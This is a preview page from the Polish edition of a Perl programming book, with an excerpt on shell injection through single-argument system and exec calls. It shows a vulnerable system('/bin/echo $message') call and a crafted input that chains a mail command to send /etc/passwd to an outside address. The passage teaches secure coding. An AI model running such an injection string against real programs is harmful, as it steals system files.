O'Reilly logo

Perl. Mistrzostwo w programowaniu by Brian d foy

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Listowe postacie wywołań system i exec

Jeśli używam wywołań system lub exec z pojedynczym argumentem, Perl szuka w nim metaznaków powłoki. Jeśli znajdzie metaznaki, przekazuje argument do powłoki w celu interpolacji. Wiedząc to, mogę skonstruować polecenie powłoki, które będzie wykonywać jakąś niepożądaną operację. Może mam w programie pozornie nieszkodliwe wywołanie systemowe, na przykład echo:

system( "/bin/echo $message" );

Jako użytkownik programu mogę spreparować takie dane wejściowe, że zmienna $message będzie robić więcej niż tylko dostarczać argument poleceniu echo. Poniższy łańcuch kończy polecenie echo za pomocą średnika i rozpoczyna polecenie mail, które używa przekierowania wejścia:

'Witaj, świecie!'; mail joe@example.com < /etc/passwd ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required